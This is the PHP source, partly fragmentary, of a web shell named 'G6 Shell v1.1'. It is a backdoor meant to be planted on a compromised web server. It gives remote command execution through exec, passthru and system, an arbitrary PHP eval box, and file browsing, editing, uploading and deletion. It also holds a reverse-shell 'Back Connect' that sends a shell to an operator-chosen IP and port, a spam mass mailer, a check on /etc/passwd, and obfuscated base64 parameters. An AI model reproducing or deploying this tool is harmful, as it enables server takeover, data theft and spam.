G6 Shell v1.1 - Private .::Made By Mr. P-teo::."; function get_srv_info(){ echo "
G6 Shell v1.1 - Private
Server Name: ".$_SERVER["SERVER_NAME"]."
Server IP: ".$_SERVER["SERVER_ADDR"]." [WHOIS] - [TRACEROUTE]
". "Shell Location: ".$_SERVER["SCRIPT_FILENAME"]."
Server Software: ".$_SERVER["SERVER_SOFTWARE"]." [Exploit DB]


"; } function cmd(){ $disabled = explode(', ', ini_get('disable_functions')); $diabledLower = array(); foreach($diabled as $function){$diabledLower[] = strtolower($function);} if(!in_array($diabledLower, "exec")){return "exec"; }elseif(!in_array($diabledLower, "passthru")){return "passthru";}elseif(!in_array($diabledLower, "system")){return "system";}else{return "none";}} $shellVersion = "1.1"; $upload = $_GET['dXBsb2Fk']; $downloadfilename = $_GET['ZG93bg']; $delete = $_GET['delete']; $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg']; $mkdir = $_GET['bWtkaXI']; $currentDirectoryFileDl = $_GET['downlfile']; $NavLinks = array( array( "name" => "Main", "url" => "?" ), array( "name" => "Server Information", "url" => "?c3J2aW5mbw=" ), array( "name" => "File Explorer", "url" => "?ZmlsZV9leHBsb3Jlcg=".dirname(__FILE__)."/" ), array( "name" => "Terminal", "url" => "?dGVybWlhbmw" ), array( "name" => "Hash Identifier", "url" => "?aGk=" ), array( "name" => "PHP Exec", "url" => "?eval" ), array( "name" => "Back Connect", "url" => "?YmNrbmV0=" ), array( "name" => "Mass Mailer", "url" => "?kueqymass" ), array( "name" => "Shell-101", "url" => "?a253aXN1ZQ" ), array( "name" => "Self Remove", "url" => "?srmve" ) ); $CurrentUrl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $last = count($NavLinks) - 1; foreach($NavLinks as $NavLink => $NavRow){ $linknames = ($NavLink == 0); $linkurls = ($NavLink == $last); echo ''.$NavRow['name'].' / '; } if(strstr($CurrentUrl, "readfile")){ $sourcefile = $_REQUEST['readfile']; if(is_file($sourcefile)){ get_srv_info(); if(isset($sourcefile)) { $Finalsource = file_get_contents($sourcefile); echo "Editing: ".$sourcefile."

« Back to files

"; } }else{ echo "Data not sent."; } if(isset($_POST['save'])){ $new_source = $_POST['sourcecode']; $source_edit = fopen($sourcefile, 'w'); fwrite($source_edit, $new_source); fclose($source_edit); } }elseif(strstr($CurrentUrl, "aGk")){ get_srv_info(); echo "

G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).

"; if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult == "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "Not Hash Entered"; } ?>
Enter Hash:
Result:

Back Connect

Back connect will allow you to enter system commands remotely.

IP Address:
Port:
'; if(isset($_POST['bind'])) { echo "

Attempting Connection...

"; $ip = $_POST['ip']; $port= $_POST['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0){echo "$errno : $errstr";}else if (!$sockfd) {$result = "

Unexpected error has occured, connection may have failed.

";} else {fputs ($sockfd ,"\n{################################################################}\n..:: G6 W3b Sh3ll v1.1- Coded By Mr. P-teo ::..\n\n=> Backconnect \n=> Back \n \n{################################################################}"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)){ $cmdPrompt = '[G6]#:> ';fputs ($sockfd , $cmdPrompt );$command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd);}} echo "

"; }elseif(strstr($CurrentUrl, "bWtmbA")){ get_srv_info(); echo "

If no file path is included it will be created within the same directory as the shell.

Filename:

"; $newfilename = htmlentities($_POST['newfilename']); if(isset($_POST['create'])){$ourFileName = $newfilename;$ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");fclose($ourFileHandle);} echo "

"; }elseif(strstr($CurrentUrl, "bWtkaXI")){ get_srv_info(); echo "

If no file path is included directory will be created within the same directory as the shell.

Directory Name:

"; $newdirname = htmlentities($_POST['newdirname']); if(isset($_POST['createdir'])){ $ourdirName = $newdirname; mkdir($ourdirName, 0777); echo "Directory Created!"; } echo "

"; }elseif(strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")){ get_srv_info(); $upload = $file_explorer; echo '

'; if(isset($_POST['godir'])){$mandircha = $_POST['chdir'];if($mandircha){ header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_POST['chdir']);}} ?>

".date("m/d/y", filemtime($file)).""; } function permissions($file){ if(is_readable($file)){ $readable = "r"; }else{ $readable = "?"; } if(is_writable($file)){ $writable = "w"; }else{ $writable = "?"; } if(is_executable($file)){ $executable = "x"; }else{ $executable = "?"; } if($readable."--".$writable."--".$executable == "r--w--x"){ return "
".$readable."--".$writable."--".$executable."
"; }else{ return "
".$readable."--".$writable."--".$executable."
"; } } $Files = scandir($file_explorer); foreach($Files as $File){ if($File == ".."){ $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg']; //Up a directory $currentDirectory = substr($currentDirectory, 0, strrpos($currentDirectory, "/")); echo ""; }elseif($File == "."){ //Same as current Dir, no need for this... }else{ $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg']; $type = GetFileType($currentDirectory. "/" .$File); if($type == "Directory"){ echo ""; }else{ echo ""; } } } ?>
FileName'sFiletypeSizePermisionsLast Modified Options
" . $File . "
" . $File . "/
" . $type . "
" . GetFileSize($currentDirectory. "/" .$File) . "".permissions($currentDirectory. "/" .$File)."" . LastModified($currentDirectory. "/" .$File) . "Not Availible
" . $File . "
" . $type . "
" . GetFileSize($currentDirectory. "/" .$File) . "".permissions($currentDirectory. "/" .$File)."" . LastModified($currentDirectory. "/" .$File) . "E - B - D

File Upload


alert("File successfully uploaded, enjoy.");';} } ?>

Create Directory


0){mkdir($file_explorer."/".$_POST['dirname'], 777) or die($file_explorer."/".$_POST['dirname']);}} ?>


Mass Mailer

Be warned using the mass mailing feature may attract attention to your G6 shell. Seperate each email with ;

To Email(s):
Subject:
From Email:
Message:
[ON";}else{$s_safemode = "[OFF"; } if(extension_loaded('curl')){$curls="[ON]";}else{$curls="[OFF]";} echo "Server Port: ".$_SERVER['SERVER_PORT']."

HTTP Connection: ".$_SERVER['HTTP_CONNECTION']."

Operating System: ".php_uname()."

"; if(get_magic_quotes_gpc()){echo "Magic Quotes: [ENABLED]

";}else{echo "Magic Quotes: [DISABLED]

";} echo "PHP Version: ".phpversion()."

Safe Mode: ".$s_safemode."]


Curl: ".$curls."

Accept Encoding: ".$_SERVER['HTTP_ACCEPT_ENCODING']."

Admin: ".$_SERVER['SERVER_ADMIN']."

Disabled Functions: "; if(!empty($disabled)){ foreach($disabled as $functionsdis){ echo $functionsdis.", "; } }else{ echo "none"; } echo "

/etc/passwd: "; if(is_readable("/home/etc/passwd")){ echo "Readable"; }else{ echo "Unreadable"; } }elseif(strstr($CurrentUrl, "dGVybWlhbmw")){ get_srv_info(); ?>

Command line execution via exec, passthru or system.

Command Execution:
"; exec($_POST['command'], $out); foreach ($out as $line) { echo "$line\n"; } }elseif (cmd()=="passthru") { echo "Using: passthru => "; passthru($_POST['command'], $out); foreach ($out as $line) { echo "$line\n"; } }elseif(cmd()=="system"){ echo "Using: system => "; system($_POST['command'], $out); foreach ($out as $line) { echo "$line\n"; } } }elseif(strstr($CurrentUrl, "a253aXN1ZQ")){ get_srv_info(); echo "

Information

G6 Shell v".$shellVersion." Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.

"; ?>

Eval (PHP code execution)


Information

Enter your specified php code within the textarea and wait for the response.

Example: echo phpinfo();



Warning

including external files with seperate stylesheets may affect the apearence of G6 styles.

If you are sure you wish to remove the shell click the button below, make sure you are certain as you wil only have one shot at this.





Private Shell Coded By Mr. P-teo